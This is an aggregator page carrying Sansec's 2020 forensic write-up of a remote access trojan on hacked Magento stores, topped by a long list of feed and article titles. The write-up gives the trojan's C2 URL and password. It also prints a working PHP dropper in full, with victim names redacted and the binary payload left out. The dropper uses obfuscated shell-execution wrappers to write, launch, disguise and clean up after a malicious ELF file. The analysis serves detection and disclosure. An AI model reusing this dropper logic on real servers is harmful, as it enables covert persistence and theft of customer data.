惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Jina AI
Jina AI
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
T
Troy Hunt's Blog
T
The Exploit Database - CXSecurity.com
Microsoft Security Blog
Microsoft Security Blog
V
Visual Studio Blog
F
Fortinet All Blogs
博客园_首页
P
Proofpoint News Feed
V
Vulnerabilities – Threatpost
The Cloudflare Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
H
Heimdal Security Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
A
About on SuperTechFans
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
AI
AI
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
S
Security Affairs
The Register - Security
The Register - Security
S
Security @ Cisco Blogs
Hugging Face - Blog
Hugging Face - Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
博客园 - 聂微东
Schneier on Security
Schneier on Security
WordPress大学
WordPress大学
Google DeepMind News
Google DeepMind News
GbyAI
GbyAI
T
Tailwind CSS Blog
Hacker News: Ask HN
Hacker News: Ask HN
W
WeLiveSecurity
D
Docker
L
LangChain Blog
B
Blog RSS Feed
The Last Watchdog
The Last Watchdog
Cloudbric
Cloudbric
TaoSecurity Blog
TaoSecurity Blog
N
Netflix TechBlog - Medium
酷 壳 – CoolShell
酷 壳 – CoolShell
I
InfoQ
The Hacker News
The Hacker News
AWS News Blog
AWS News Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
宝玉的分享
宝玉的分享
I
Intezer
云风的 BLOG
云风的 BLOG
V2EX - 技术
V2EX - 技术
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO

Sansec - experts in eCommerce security

GorgonAgora: 4,800+ fake storefronts skim cards across hundreds of impersonated brands Sansec adds support for Sylius 1 & 2 Critical vulnerability in Mirasvit Cache Warmer for Magento Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts Composer vulnerability leaks GitHub tokens, threatens PHP supply chain Over 200 PrestaShop stores expose installer, allowing full takeover ClickFix malware hits DoD cybersecurity vendor homepage SVG Onload Tag Hides Magecart Skimmer on 99 Stores Mass PolyShell attack wave hits 471 stores in one hour Novel WebRTC skimmer bypasses security controls at $100+ billion car maker PolyShell: unrestricted file upload in Magento and Adobe Commerce Digital skimmer hits global supermarket chain Building a faster YARA engine in pure Go Magento Developers Impersonated in Targeted GitHub Malware Operation Claude finds 353 zero-days on Packagist The billion-dollar security.txt problem Keylogger targets 200,000+ employees at major US bank ConnectPOS leaked Github secrets for years Critical backdoor found in MGT Varnish extension SessionReaper attacks have started, 3 in 5 stores still vulnerable SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236) Adobe patches critical Magento admin takeover via menu injection Backdoor found in popular ecommerce components Found defunct.dat on your site? You've got a problem. You have 2 weeks left to set up CSP for your store Merchants left guessing at last-minute PCI-DSS u-turn Magento Security Release APSB25-08 [Impact Analysis] Sorry, client-side security does not work Google services abused in skimming campaigns Thousands of Adobe Commerce stores hacked in competing CosmicSting campaigns CosmicSting attack & defense overview Persistent backdoors injected on Adobe Commerce via new CosmicSting attack CosmicSting attacks have started hitting major stores Polyfill supply chain attack hits 100K+ sites CosmicSting attack threatens 75% of Adobe Commerce stores Persistent Magento backdoor hidden in XML Sansec joins forces with Google's VirusTotal Sansec and Europol counter online skimming Magento wish list exploit bypasses WAF protection Is your store’s newsletter being used for phishing? Malware Persistence via Telegram and GitHub Postponed Exfiltration Evades Detection Sansec analysis: 12% of online stores leak private backups Vendors defeat Magento security patch (+ simple check) Fake Klaviyo accounts added to Magento Adobe Commerce merchants to be hit with TrojanOrders this season Extortion of Magento merchants Surge in Magento 2 template attacks Magento vendor Fishpig hacked, backdoors added Magento 2 critical vulnerability (CVE-2022-24086 & CVE-2022-24087) NaturalFreshMall: a Magento Mass Hack Magento and the Log4j vulnerability NginRAT parasite targets Nginx CronRAT malware hides behind February 31st New linux_avp malware hits eCommerce sites Case Study: How eCommerce Hackers Silently Steal Credit Card Data Google Apps Script used to steal data Fake payment page before checkout on Shopify and BigCommerce Hackers exploit security flaw right before Black Friday Payment skimmer hides in social media buttons Cardbleed: 3% of Magento install base hacked North Korean hackers are skimming US and European shoppers Digital skimmer runs entirely on Google, defeats CSP Lockdown: Stores closed, online stores hacked Do these two things to keep your Magento 1 store running after June Magento 1 still PCI compliant after 1 July 2020? Sansec reveals longest Magecart skimming operation to date [Analysis] Maxcluster and Sansec partner to secure German stores Indonesian Magecart hackers arrested Payment skimmers have impersonated Sansec American Cancer Society hit by payment skimmer Magento security extentions vendor got hacked FBI recommends eCommerce malware protection Sansec at Europol training: 50,000+ stores hacked PCI-SSC/RHISAC quote Sansec: 20% stores reinfected Critical Magento 2 flaw exploited within 16 hours 57 payment gateways from Germany to Brazil targeted Sports brand Puma infected with advanced malware Credit cards of Atlanta Hawks fans stolen Bad extensions now main source of Magento hacks: a solution! Large sites hacked via Adminer database tool PHP tool 'Adminer' leaks passwords Competing digital skimmers sabotage each other Merchants struggle with MageCart reinfections Backdoor found in Webgility Unpublished security flaws (0days) massively exploited German political party store hacked before election MageCart: now with tripwire ABS-CBN next in series of high profile breaches Is your Google Analytics code malicious? MagentoCore group hacks 7,339 stores and counting Hackers breached Magento through helpdesk Cryptojacking found on 2496 online stores Why ordering HTTP headers is important Warning: fake Magento patch 9789 contains virus A Magento breach analysis: part 1 An OpenCart/Magento hacking dashboard Self-healing malware restores itself after deletion Visbot malware found on 6691 stores [analysis] Criminals have rewired 3,500 online stores
eCommerce trojan accidentally leaks victims
Sansec Forensics Team · 2020-12-18 · via Sansec - experts in eCommerce security

A Remote Access Trojan was caught on numerous large stores

A Remote Access Trojan was caught on numerous large stores

Sansec discovered a clever remote access trojan (RAT) that has been hiding in the alleys of hacked eCommerce servers. Despite the advanced setup, perpetrators mistakenly left a list of victim stores in a deleted file, which unveils the depth of this hacking campaign. The RAT is used to gain illicit long-term access to eCommerce systems, in order to steal valuable customer data (aka Magecart).

Thanks to Hampus Westman for contributing to this research

Observing the RAT

The RAT is a 64bit ELF executable that hides in your server's process table with benign sounding names like dnsadmin or sshd [net].

Magento RAT hides as dnsadmin or sshd process

To frustrate forensic analsyis, the RAT sleeps almost continuously. Yet, it wakes when most sysadmins haven't started their work day yet. At 7am, it will request instructions from its malicious master (C2) at https://www.hostreselling.com/dashboard/. It uses the e4220b186227631edb41c3c942b6b6c9ace1f7eec2674ae634aa63bceca20b4e password to authenticate.

Magento RAT connects to C2 server

Further analysis of the RAT executable reveals a peculiar comment, referring to a common Javascript component (jQuery). We have no idea why it is included.

While the jquery is the most smart and comrfortable one of www
world in computer but stacks of those ... And also lots of hosts
and selling sites for retail.

RAT dropper reveals prior victims

Sansec managed to intercept the RAT dropper code (PHP). Curiously it contains a long list of prior victims. A full copy of the RAT dropper can be found below. Where possible, we have reached out to the mentioned merchants to alert them of a breach of their system.

Magento RAT reveals list of victims

Are you affected? Our eComscan scanner has updated detection signatures for this eCommerce RAT.

Multiple actors?

Sansec has collected largely similar RATs on different systems. Curiously, they have been compiled on different Red Hat and Ubuntu Linux systems:

GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.4) 4.8.4
GCC: (GNU) 4.8.5 20150623 (Red Hat 4.8.5-39)
GCC: (Ubuntu 8.3.0-6ubuntu1) 8.3.0

This may indicate that multiple people were involved in this campaign. Or, for example, that the RAT source code is publicly available, and possibly for sale on dark web markets.

Recommendations

Sansec recommends all affected merchants to engage a forensic investigate and cleanup. We have provided a checklist for your convenience. Our flagship software eComscan will help your team right now with the investigation, and will also help to prevent future incidents.

Actual RAT dropper code

The dropper is designed to parse many different Magento deployment setups. Second, the PHP code seems to be written by someone unfamiliar with PHP. It uses shared memory blocks, which is rarely used in PHP but is much more common in C programs.

This code has been redacted by Sansec to conceal the names of infected victim stores.

// common initialization of bds...
function init_common() {
    //ignore_user_abort(true);
    set_time_limit(0);
    set_time_limit(0);
    @putenv("PHP_FORCECLI=true");

    $docroot = get_docroot();

    // for example : at <■■■■■■■■■■■■■■.com> : docroot <> __FILE__'s directory!
    //echo ("file: backdoor file path : " . __FILE__ . "\n");
    //echo ("current user : " . get_current_user() . "");
}

// get real docroot path and register as global variable.
// must called at first!
function get_docroot() {
    if (isset($GLOBALS['__docroot__'])) {
        return $GLOBALS['__docroot__'];
    }
    $docroot = getcwd();

// for automatically released sites...
    $dir_pieces = array_reverse(explode("/", $docroot));
    if (count($dir_pieces) >= 3) {
        if ($dir_pieces[1] == 'releases' && preg_match('/^[0-9]*$/', $dir_pieces[0]) != 0) {
            for ($i = 2; $i < count($dir_pieces); $i++) {
                $new_pieces[] = $dir_pieces[$i];
            }
            print_r($dir_pieces);
            print_r($new_pieces);
            $docroot = implode('/', array_reverse($new_pieces)) . '/current';
        }
    }

    if (substr($docroot, -1, 1) != '/') {
        $docroot .= "/";
    }
    //$docroot = BP . '/';
    //$docroot = '/home/■■■■■■■■■/vhosts/www.■■■■■■■■■.com/current/';  // for ■■■■■■■■■
    //$docroot = '/home/■■■■■■■■■/vhosts/www.■■■■■■■■■.com/releases/20200717062834/';
    //$docroot = '/data/www/■■■■■■■■■/current/src/'; //■■■■■■■■■
    //$docroot = '/home/■■■■■■■■■/public_html/current/'; // for ■■■■■■■■■
    //$docroot = '/var/www/share/live.■■■■■■■■■.at/current/src/htdocs/';  //■■■■■■■■■
    //$docroot = '/var/www/html/■■■■■■■■■.com/';  //■■■■■■■■■
    //$docroot = '/home/■■■■■■■■■/1587130362_public_html/';  // for ■■■■■■■■■
    //$docroot = '~/www/';     // ■■■■■■■■■
    //$docroot = '/srv/public_html/';         //for ■■■■■■■■■ , ■■■■■■■■■ ■■■■■■■■■, ■■■■■■■■■, ■■■■■■■■■,■■■■■■■■■ , ■■■■■■■■■
    //$docroot = '/srv/public_html/■■■■■■■■■-live/'; // for ■■■■■■■■■
    //$docroot = '/home/■■■■■■■■■/public_html/';  // for ■■■■■■■■■.com.au ,■■■■■■■■■ ,■■■■■■■■■
    //$docroot = '/media/■■■■■■■■■.mx/current/';           //■■■■■■■■■
   //$docroot = '/data/www/■■■■■■■■■/current/src/';
    //$docroot = '/home/■■■■■■■■■/public_html_jun11/';       //■■■■■■■■■ house
    //$docroot = '/var/www/html/■■■■■■■■■.com/';            //www.■■■■■■■■■.com
    //$docroot = '/srv/public_html/webroot/';           //■■■■■■■■■
    //$docroot = '/var/www/■■■■■■■■■.com/htdocs/';      //■■■■■■■■■
    //$docroot = '/home/■■■■■■■■■/public_html/';      //■■■■■■■■■
    //$docroot = '/var/www/■■■■■■■■■.ca/public_html/';      //■■■■■■■■■
    //$docroot = '/var/www/■■■■■■■■■/■■■■■■■■■.eu/public_html/';   //■■■■■■■■■
    //$docroot = '/srv/magento/live/www/';
    //$docroot = '/home/■■■■■■■■■/public_html/';       //■■■■■■■■■.com
    //$docroot = '/home/■■■■■■■■■/■■■■■■■■■.com/';
    //$docroot = '/var/www/prod/current/'; //■■■■■■■■■
    //$docroot = '/home/■■■■■■■■■/public_html/';
    //$docroot = '/var/www/■■■■■■■■■/current/src/';           # --https://■■■■■■■■■.co/

   //$docroot = '/home/■■■■■■■■■/public_html/■■■■■■■■■.ae/';                  #0

    #$docroot = '/var/www/■■■■■■■■■/current/src/';
    //$docroot = '/srv/public_html/current/';
    //$docroot = '/var/www/vhosts/■■■■■■■■■.ie/httpdocs/';
    //$docroot = '/var/www/■■■■■■■■■/■■■■■■■■■.eu/public_html/';      #■■■■■■■■■

    $GLOBALS['__docroot__'] = $docroot;
    return $docroot;
}

function work_command($in, $f_out = true) {
    if ($f_out) {
        echo ("bdor@command$ " . $in . "\n");
        echo ("----------------------------------------\n");
    }
    $out = "";
    $dum1 = 'e'.'xe'.'c';
    $dum2 = 'p'.'ass'.'thru';
    $dum3 = 'sy'.'stem';
    $dum4 = 's'.'hell'.'_ex'.'ec';
    $dum5 = 'po'.'pen';
    $func = "";

    if (function_exists($dum1)) {
        @$dum1($in,$out);
        $out = @join("\n",$out);
        $func = $dum1;
    } elseif (function_exists($dum2)) {
        ob_start();
        @$dum2($in);
        $out = ob_get_clean();
        $func = $dum2;
    } elseif (function_exists($dum3)) {
        ob_start();
        @dum3($in);
        $out = ob_get_clean();
        $func = $dum3;
    } elseif (function_exists($dum4)) {
        $out = $dum4($in);
        $func = $dum4;
    } elseif (is_resource($f = @$dum5($in,"r"))) {
        $out = "";
        $dum_rd = 'fr'.'ead';

        while(!@feof($f))
            $out .= $dum_rd($f,1024);
        pclose($f);
        $func = $dum5;
    }
    if ($f_out) {
        echo $func . '():', PHP_EOL;
        echo($out);
        echo ("\n----------------------------------------\n");
    } else {
        return $out;
    }
}

//////////DON'T CHANGE PATTERN////////////
define('RAT_TMP_FNAME', 'sshd');
define('ELF_RAT_PARAM', '[net]');
define('RAT_FILE_CONTENTS', `<ACTUAL ELF CODE>`);

define('TMP_WORK_DIR', 'pub/media');
define('NO_HUP_CMD', '');

main();

function main() {
    init_common();
    $docroot = get_docroot();
    /*
    if (check_ELF_process_running(9995)) {     # elf Monitor
        clear_TMP();
        exit;
    }
    */
    if (!is_dir($docroot . TMP_WORK_DIR)) {
        echo 'There is no such directory : ' . $docroot . TMP_WORK_DIR . PHP_EOL;
        exit;
    }
    chdir($docroot . TMP_WORK_DIR);


    // prepare rat
    $fname = RAT_TMP_FNAME;
    $fh = @fopen($fname, "wb");
    if ($fh == FALSE) {
        exit("Fail: " . $fname . " not writeable...\n");
    } else {
        @fwrite($fh, base64_decode(RAT_FILE_CONTENTS));
        @fclose($fh);
        echo("Success: made rat file " . $fname . PHP_EOL);
    }
    work_command('chmod +x ./' . RAT_TMP_FNAME);

    // execute rat directly
    $cmd = 'PATH=.:${PATH}; export PATH; ' .
        NO_HUP_CMD . " " . RAT_TMP_FNAME . " " . ELF_RAT_PARAM . '  2>1  1>/dev/null &';
    work_command($cmd);

    sleep(1);

    // to confirm
    work_command('ps -ef | grep ' . RAT_TMP_FNAME);
    //work_command('cat ./1');
    work_command('ls -all ./');

    // clear tmp
    clear_TMP();
    //check jpeg file has removed all

    work_command('ls -all ./');

    work_command('rm -f ' . $docroot . TMP_WORK_DIR . '/log_tmp_11 ');

    echo ("\n========================================\n");
    exit;
}


function check_ELF_process_running($SHARED_MEMORY_KEY) {
    if(!function_exists("shmop_open")) {
        echo "Failed to execute shmop_open, Maybe disabled!.\n";
        return false;
    }
    $shared_memory_id = @shmop_open($SHARED_MEMORY_KEY, "a", 0, 0);
    if (!$shared_memory_id) {
        echo "Failed to open shared memory.\n";
        return false;
    }else {
        $size = shmop_size($shared_memory_id);
        $shared_memory_string = shmop_read($shared_memory_id, 0, $size);
        if($shared_memory_string == FALSE) {
            echo "Failed to read shared memory\n";
            sem_release($semaphore_id);
            return false;
        }
        $shared_memory_array = array_slice(unpack('C*', "\0".$shared_memory_string), 1);
        $pow = 1;
        $m_pid = 0;
        for($i = 0; $i < $size; $i++) {
            $m_pid += intval($shared_memory_array[$i]) * $pow;
            $pow *= 256;
        }
        shmop_close($shared_memory_id);
    }

    if($m_pid && posix_getpgid($m_pid) !== false) {
        echo "ELF Process is already running, PID = ".$m_pid."\n";
        return true;
    }
    else {
        echo "ELF Process is not running now,Shared Meomory data = ".$m_pid."\n";
        return false;
    }
}
;flush();exit;

Read more